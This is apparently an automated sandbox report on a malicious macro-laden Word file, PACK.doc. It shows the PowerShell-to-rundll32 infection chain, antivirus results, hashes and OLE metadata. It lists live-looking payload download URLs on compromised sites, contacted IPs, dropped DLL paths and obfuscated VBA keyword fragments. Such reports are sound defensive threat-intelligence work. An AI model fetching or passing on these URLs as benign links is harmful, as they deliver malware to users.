                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 336504; Sample: PACK.doc; Start date: 06/01/2021; Architecture: WINDOWS; Score: 100

Start (node 2)
  Signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 12 other signatures
  started cmd.exe (node 14)
    Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
    started powershell.exe (node 20) [12 9]
      DNS/IP: petafilm.com 176.53.69.151, ports 49167, 80, RADORETR Turkey
      Dropped: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll, PE32
      Signature: Powershell drops PE file
      started rundll32.exe (node 27)
        started rundll32.exe (node 29) [15]
          Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
          started rundll32.exe (node 32) [5]
            Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
            started rundll32.exe (node 35) [5]
              Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              started rundll32.exe (node 38) [5]
                Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                started rundll32.exe (node 41) [5]
                  Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  started rundll32.exe (node 44) [5]
                    Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                    started rundll32.exe (node 47)
                      Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
    started msg.exe (node 25)
  started WINWORD.EXE (node 17) [293 23]
    Dropped: C:\Users\user\Desktop\~$PACK.doc, data


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
PACK.doc | 30% | Virustotal |
PACK.doc | 50% | ReversingLabs | Document-Word.Trojan.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
18.2.rundll32.exe.700000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
21.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.2.rundll32.exe.290000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.2.rundll32.exe.300000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
8.2.rundll32.exe.250000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.280000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

Source | Detection | Scanner | Label
petafilm.com | 6% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://petafilm.com | 6% | Virustotal |
http://petafilm.com | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | 5% | Virustotal |
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | 0% | Avira URL Cloud | safe
http://5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ | 0% | Avira URL Cloud | safe
https://somanap.com/wp-admin/P/ | 0% | Avira URL Cloud | safe
https://fnjbq.com/wp-includes/rlR/ | 100% | Avira URL Cloud | malware
http://wap.zhonglisc.com/wp-includes/QryCB/ | 100% | Avira URL Cloud | malware
http://petafilm.com/wp-admin/4m/ | 100% | Avira URL Cloud | malware
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | 100% | Avira URL Cloud | malware
http://givingthanksdaily.com/qlE/VeF/ | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
petafilm.com | 176.53.69.151 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ | true | Avira URL Cloud: safe | unknown
http://petafilm.com/wp-admin/4m/ | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp; rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp; rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp; rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp; rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp | false | | high
http://petafilm.com | powershell.exe, 00000005.00000002.2102091328.0000000003A04000.00000004.00000001.sdmp | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp; rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp | false | | high
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp | true | 5%, Virustotal; Avira URL Cloud: safe | unknown
http://www.piriform.com/cc= | powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp | false | | high
https://somanap.com/wp-admin/P/ | powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp; rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp; rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp | false | | high
https://fnjbq.com/wp-includes/rlR/ | powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://wap.zhonglisc.com/wp-includes/QryCB/ | powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp; rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp; rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp; rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp | false | | high
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://givingthanksdaily.com/qlE/VeF/ | powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

                                          Contacted IPs

                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
176.53.69.151 | unknown | Turkey | 42926 | RADORETR | true
5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true

                                          General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336504
Start date: 06.01.2021
Start time: 08:56:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PACK.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@38/8@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 94.1% (good quality ratio 90.5%)
• Quality average: 74.7%
• Quality standard deviation: 25.3%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

Time | Type | Description
08:57:42 | API Interceptor | 1x Sleep call for process: msg.exe modified
08:57:43 | API Interceptor | 21x Sleep call for process: powershell.exe modified
08:57:45 | API Interceptor | 960x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

Match | Associated Sample Name / URL | Detection | Context
176.53.69.151 | bestand-8881014518 00944.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | pack 2254794.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | informazioni-0501-012021.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | rapport 40329241.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | Dati_012021_688_89301.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | 2199212_20210105_160680.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | ARCHIVO_FILE.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | doc_X_13536.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | ytgeKMQNL2.doc | malicious | petafilm.com/wp-admin/4m/
5.2.136.90 | pack 2254794.doc | malicious | 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
5.2.136.90 | DATA-480841.doc | malicious | 5.2.136.90/6tycsc/
5.2.136.90 | Documenten_9274874 8574977265.doc | malicious | 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
5.2.136.90 | pack-91089 416755919.doc | malicious | 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
5.2.136.90 | Adjunto.doc | malicious | 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
5.2.136.90 | arc-NZY886292.doc | malicious | 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
5.2.136.90 | NQN0244_012021.doc | malicious | 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
5.2.136.90 | 4560 2021 UE_9893.doc | malicious | 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
5.2.136.90 | Scan-0767672.doc | malicious | 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
5.2.136.90 | Documento-2021.doc | malicious | 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
5.2.136.90 | informazioni-0501-012021.doc | malicious | 5.2.136.90/kcdo20u2bqptv6/
5.2.136.90 | rapport 40329241.doc | malicious | 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
5.2.136.90 | info_39534.doc | malicious | 5.2.136.90/5ciqo/dhqbj3xw/
5.2.136.90 | Dati_012021_688_89301.doc | malicious | 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
5.2.136.90 | 2199212_20210105_160680.doc | malicious | 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
5.2.136.90 | ARCHIVO_FILE.doc | malicious | 5.2.136.90/ji02pdi/39rfb96opn/
5.2.136.90 | doc_X_13536.doc | malicious | 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
5.2.136.90 | REP380501 040121.doc | malicious | 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
5.2.136.90 | doc-20210104-0184.doc | malicious | 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
5.2.136.90 | 7823099012021.doc | malicious | 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                          Domains

Match | Associated Sample Name / URL | Detection | Context
petafilm.com | bestand-8881014518 00944.doc | malicious | 176.53.69.151
petafilm.com | pack 2254794.doc | malicious | 176.53.69.151
petafilm.com | informazioni-0501-012021.doc | malicious | 176.53.69.151
petafilm.com | rapport 40329241.doc | malicious | 176.53.69.151
petafilm.com | Dati_012021_688_89301.doc | malicious | 176.53.69.151
petafilm.com | 2199212_20210105_160680.doc | malicious | 176.53.69.151
petafilm.com | ARCHIVO_FILE.doc | malicious | 176.53.69.151
petafilm.com | doc_X_13536.doc | malicious | 176.53.69.151
petafilm.com | ytgeKMQNL2.doc | malicious | 176.53.69.151

                                          ASN

                                          Match | Associated Sample Name / URL | Detection

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          Match | Associated Sample Name / URL | Detection
                                          C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll | bestand-8881014518 00944.doc | malicious

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E1AD59AA-72A2-4470-89E8-B7D87A58E0E0}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46
                                            Entropy (8bit):1.0424600748477153
                                            Encrypted:false
                                            SSDEEP:3:/lbWwWl:sZ
                                            MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                            SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                            SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                            SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                            Malicious:false
                                            Preview: ........................................user.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PACK.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed Jan 6 15:57:39 2021, length=173056, window=hide
                                            Category:dropped
                                            Size (bytes):1960
                                            Entropy (8bit):4.495607664035489
                                            Encrypted:false
                                            SSDEEP:48:84/XTFGqGqVY/roQh24/XTFGqGqVY/roQ/:84/XJGqGqy/roQh24/XJGqGqy/roQ/
                                            MD5:2D2A6D8C00D1CB6D276F088C4124950C
                                            SHA1:B13063D206F4E4D4F19789D2927E65A1A9CB3B9E
                                            SHA-256:DB5CF6C4209C2A1B72348015674F8B6C69699776BA22E4F358C19D4812BB8135
                                            SHA-512:3A3CFD5B5635D73AFBE5BD5F477CA8A194FBED94C7BC6081AAD6132346516221AE2D36E45FBB662F92E761C35847AADB8C4C0BCF3F9DC6B7550930921DA3796B
                                            Malicious:false
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):50
                                            Entropy (8bit):3.908493070364557
                                            Encrypted:false
                                            SSDEEP:3:M1umEFSt2LFSmX1umEFSv:Msm52WmT
                                            MD5:127D6DD53F384B77260068267C530A20
                                            SHA1:86CFA18B82407790368C214C0F5D80E83E6D3EDA
                                            SHA-256:96B1EA781C03A4DFD83AA8D2507B7C9AB4E8D0FFDB5D05F0FB69BCC6CAD388FB
                                            SHA-512:53164C1B5EB88659AD960E5DEA1E6AF04C3E16FB05DC8016F255A222D95FB87ECB746BF7C4150A762319C32F30B88530606876DB527F23B8BEC666560F9BDF42
                                            Malicious:false
                                            Preview: [doc]..PACK.LNK=0..PACK.LNK=0..[doc]..PACK.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JRJ1D8NWH1YIJYW9A2NJ.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5897916404018257
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqUqvsqvJCwo6z8hQCsMqUqvsEHyqvJCworIz2YYxHBf8HdlUVkIu:cydo6z8yFHnorIz2Xf8HpIu
                                            MD5:D3E84FCC21BB8F4F71EFA66C1EC1EEF3
                                            SHA1:64984C8EE50A840C188A71014F5EFFAA76EE8B25
                                            SHA-256:ADE4450E0AC3D6CB3364B709A4038EB5F52F1D7C1F472CF800501670A8E38CF9
                                            SHA-512:AB4F7ED17EB7729E5C2684CB53D984A4CE774A9F2034F9F2AD0FD8290B3E13F66F226DF50FFF68F909F45C69B6E6910F593B512FC1FE0F148FD9A6885EC5D6C5
                                            Malicious:false
                                            C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):192000
                                            Entropy (8bit):7.470368045221206
                                            Encrypted:false
                                            SSDEEP:3072:SwbpDnn9F4rNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9F8aBYF0nVp2MJHybR8dS9
                                            MD5:009380116F3429BA6F236D199F418B98
                                            SHA1:292360D762524AD98FADDB735BB58AB3DABA5327
                                            SHA-256:323F6431FB274E90DC003E567C54CB5E2327E9408F903E49CC6F3E840BF9BCF6
                                            SHA-512:5D086691A8109091C847B690E905D0BDEACE03E0A295F120F0231B4A7ADC3EC45A77FF626DD9EA792BBD32EA02909CAC2EBF255D7155011244978927F4E1645C
                                            Malicious:true
                                            Joe Sandbox View:
                                            • Filename: bestand-8881014518 00944.doc, Detection: malicious
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\Desktop\~$PACK.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:true
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: National JSON parsing Checking Account overriding metrics Shoes Handcrafted Rubber Chair cross-media, Author: Laura David, Template: Normal.dotm, Last Saved By: Lisa Moulin, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
                                            Entropy (8bit):6.6852671101832435
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:PACK.doc
                                            File size:172473
                                            MD5:d114fc2644da49f16a6be05bb0db6b08
                                            SHA1:6b5b6a9a5291b1b564ad3005c392ff1756ceef9e
                                            SHA256:d9687c1ca0f341d62cf664cdfe3c9741f1f48df25129df53df9ae81979e89a5d
                                            SHA512:2459b91d0252980b7404b7868c5f8435039bdc6edd922ca70c6e98f6bdd2cceae48e09df7cd5428b96329f3c42225abe74e2752575f91da3a22e42bdcc13d564
                                            SSDEEP:3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7glCeISWp0bl:59ufsfgIf0pLl7I/Ql

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "PACK.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:National JSON parsing Checking Account overriding metrics Shoes Handcrafted Rubber Chair cross-media
                                            Author:Laura David
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:Lisa Moulin
                                            Revision Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-05 06:14:00
                                            Last Saved Time:2021-01-05 06:14:00
                                            Number of Pages:1
                                            Number of Words:3222
                                            Number of Characters:18371
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:153
                                            Number of Paragraphs:43
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: Oi5oelv0_s4, Stream Size: 17886
                                            General
                                            Stream Path:Macros/VBA/Oi5oelv0_s4
                                            VBA File Name:Oi5oelv0_s4
                                            Stream Size:17886

                                            VBA Code Keywords

                                            Keyword
                                            DyjPBI
                                            dLrgANHCG
                                            EajdMLeD
                                            rgBSB
                                            Object
                                            yjNpyrf
                                            rJqMZII
                                            PGiog
                                            T_dehutl_mggmhizd
                                            EUMDPGt
                                            xkJxAAC
                                            AybxtEBCJ.Close
                                            JhiYfXc:
                                            VusSK
                                            "fUwLgjVtQyH"
                                            UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                                            bGnhXCA
                                            VJbwzTDT.Close
                                            VwnpBElhO
                                            MMAqSI
                                            UPhhYZEF
                                            "bVawaPADALVlWFFA"
                                            NFWzF
                                            "HiTyACJmCuGQFFJ"
                                            sGvJJWh
                                            PmBxcD:
                                            SfMKIOk
                                            "TthascRlxHZH"
                                            AybxtEBCJ:
                                            SFmrEDJ
                                            zOBhOx
                                            fUGQf
                                            numuq
                                            rEeiBJ
                                            ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                                            RkPWCDPC
                                            JADCpjk
                                            PmBxcD
                                            pDPzBJmM
                                            bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                                            WSARpB
                                            EUMDPGt.Close
                                            HnBvAEH
                                            "WXovaGHxqSlUt"
                                            QEIFFM
                                            bPFNuJ.WriteLine
                                            "PzrrnIFtpmxAx"
                                            EUMDPGt:
                                            ilONFzHG
                                            "akTuJaIGmZrUyF"
                                            qpOWEIHHA
                                            yJouG
                                            XwZxsHCGt
                                            FTalMbF
                                            XDJPUW
                                            "ALpzEMcwuWl"
                                            gQxBD:
                                            UUoAB
                                            tcYiEMeRH.Close
                                            nIHrI
                                            eUdbDAHHs.WriteLine
                                            "uJnfBHIPFKBxHBmEE"
                                            FPWaF
                                            JADCpjk.WriteLine
                                            xxYeFGUAH
                                            rfDgD
                                            njKwJdA.WriteLine
                                            "bOOXnOJYtbRAbm"
                                            VJbwzTDT:
                                            RkPWCDPC:
                                            UPhhYZEF.Close
                                            eWkHqVao
                                            Resume
                                            XKPUEfhk
